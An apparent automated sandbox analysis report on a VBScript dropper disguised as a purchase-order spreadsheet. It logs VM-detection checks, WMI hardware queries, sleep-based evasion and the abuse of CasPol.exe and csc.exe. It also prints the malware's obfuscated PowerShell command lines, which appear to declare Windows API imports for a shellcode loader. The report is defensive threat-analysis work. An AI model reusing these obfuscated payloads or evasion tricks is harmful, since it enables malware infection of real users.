Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: Initial file Initial file: do while timer-temp<sec
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7744 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7744 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7892 Thread sleep count: 666 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7892 Thread sleep time: -333000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7744 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9078 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 666 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation Jump to behavior
Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: wscript.exe, 00000000.00000003.1687529078.0000016C0C123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1684123875.0000016C0C120000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXznfekopperneX?
Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 0000000B.00000002.6724207212.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWN
Source: PO-09784893 xlsx.vbs Binary or memory string: Vi5 = Vi5 & "PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf5"
Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 0000000B.00000002.6724207212.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.6719479887.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1683925145.0000016C0C1E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf51i
Source: PO-09784893 xlsx.vbs Binary or memory string: Vi5 = Vi5 & "gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXzn"
Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000005.00000002.2689267836.000000000AA19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1FA8B5B8 LdrInitializeThunk, 11_2_1FA8B5B8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelku
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelku Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt 